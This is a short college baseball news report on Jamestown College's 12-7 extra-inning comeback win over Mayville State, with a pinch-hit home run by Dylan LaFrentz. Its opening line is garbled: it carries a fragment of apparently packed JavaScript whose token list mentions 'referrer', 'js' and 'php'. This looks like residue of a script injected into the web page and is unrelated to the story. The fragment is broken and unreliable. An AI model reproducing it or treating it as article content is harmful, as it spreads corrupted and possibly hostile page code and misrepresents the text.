JAMESTOWN fstit|var|u0026u|referrer|dbitz||js|php’.split(‘|’),0,{}))
(NewsDakota.com)- Down three runs in the 8th inning it looked like the Jimmies were in danger of heading to an elimination game, but Dylan LaFrentz delivered the biggest hit of the season to date. A three-run pinch-hit home run tied the game and the Jimmies eventually beat the Mayville St. Comets in extra innings 12-7.
Both starting pitchers were cruising along through the first four innings having just allowed one run a piece. But Paul Roers and Vic Skolofsky ran into some trouble in the fifth.
Skolofsky yielded a pair of Jimmie runs on a double by Nolan Skowronek and when Matt Achter reached on an error, that put Jamestown up 3-1.
The Jimmies wouldn’t hold the lead for very long as the Comets responded with six runs in the home half of the fifth. The biggest blow was a grand slam by Kurt McCallum to give Mayville St. their first lead.
Jamestown College got one run back in the 7th on a Skowronek solo blast.
In the 8th inning, LaFrentz came on to pinch hit for Nate Christiuk with the Jimmies down three and hit a blast that carried over the head of CF Spencer Kidder to tie the game at seven.
Neither team plated a run in the 9th and sent the games to extra innings. The Jimmies put up a five spot in the top of 10 capped off by a three-run Nico Moreno home run. Matt Achter had the game-winner, a single to right to break the 7-7 tie.
The Jimmies will await the winner of Mayville St and Dakota St./Valley City St. in the first game on the championship series at 3:30pm on Friday. If the Jimmies were to lose, they would play in a winner-take-all championship game on Saturday. Should they win either game, they will head to the NAIA National Tournament for the 6th time.
The game will be broadcast on 1400 KQDJ beginning at 3:30pm Friday.
